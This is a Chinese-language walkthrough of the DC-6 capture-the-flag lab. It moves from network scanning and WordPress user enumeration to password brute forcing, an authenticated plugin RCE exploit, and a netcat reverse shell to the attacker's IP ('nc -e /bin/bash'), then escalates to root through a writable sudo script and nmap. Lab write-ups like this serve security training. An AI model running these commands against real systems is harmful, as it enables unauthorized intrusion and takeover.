🖳 主机发现
sudo netdiscover -i eth0 -r 192.168.1.0/24Currently scanning: Finished! | Screen View: Unique Hosts 21 Captured ARP Req/Rep packets, from 6 hosts. Total size: 1260 _____________________________________________________________________________IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.1.1 28:c8:7c:19:bf:e8 13 780 zte corporation 192.168.1.5 20:1e:88:ad:fc:55 1 60 Intel Corporate 192.168.1.4 c4:e1:a1:cf:47:95 4 240 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,L192.168.1.6 0c:d8:6c:a5:e7:a1 1 60 SHENZHEN FAST TECHNOLOGIES CO.,LTD 192.168.1.14 08:00:27:e2:b6:88 1 60 PCS Systemtechnik GmbH 192.168.1.3 a2:86:90:e6:04:98 1 60 Unknown vendor
目标是192.168.1.14
👁 服务扫描
# Nmap 7.94SVN scan initiated Fri Feb 16 15:50:20 2024 as: nmap -p- -oN nmap_scan -sV -sC --min-rate 5000 192.168.1.14
Nmap scan report for 192.168.1.14 (192.168.1.14)
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:E2:B6:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 16 15:50:28 2024 -- 1 IP address (1 host up) scanned in 8.69 seconds
发现重定向到http://wordy/这个网站,我们把它加入hosts文件中
发现主页是一个wordpress网站,对其进行扫描
wpscan -e vt,vp,u --url http://wordy/
[+] admin| Found By: Rss Generator (Passive Detection)| Confirmed By:| Wp Json Api (Aggressive Detection)| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection)[+] graham| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] sarah| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] jens| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] mark| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)发现了很多用户,记录下来,然后尝试一下登录界面的弱口令,没有试出弱口令,那就尝试爆破,因为爆破路径也没有什么有趣的,那攻击向量只有web喝ssh,web又只有这个登录页面是暴露的。
根据作者的提示,生成一下密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
尝试爆破
wpscan --url http://wordy -U users -P passwords.txt
得到了凭证
mark:helpdesk01
🚪🚶 获取权限
登录上之后,发现有一个Activity Monitor,搜索一下有没有漏洞
searchsploit Activity
···
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | php/webapps/45274.html
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) | php/webapps/50110.py
···
我们使用下面那个,执行之后输入ip,username,password,然后用nc反弹shell。
nc -e /bin/bash 192.168.1.13 443
🛡️ 提升权限
用linpeas.sh辅助提权脚本枚举信息
这里有俩个有趣的文件,我们可以在things-to-do.txt中发现用户gaham的凭证
我们用ssh登录上去,后进行一些枚举,发现可以以jens身份运行backups.sh脚本,且因为gaham用户是devs组,对该脚本有修改权限,我们可以在里面加一个/bin/bash来启动一个jens用户的shell
sudo -u jens ./backups.sh
或者jens的shell后,再次使用sudo -l进行检查
然后在GTFOBins搜索nmap
https://gtfobins.github.io/gtfobins/nmap/#sudo
最终拿到root的shell
📖 推荐文章
DC-6下载地址
DC-6国外大佬walkthrough文章
GTFOBins地址
个人博客地址
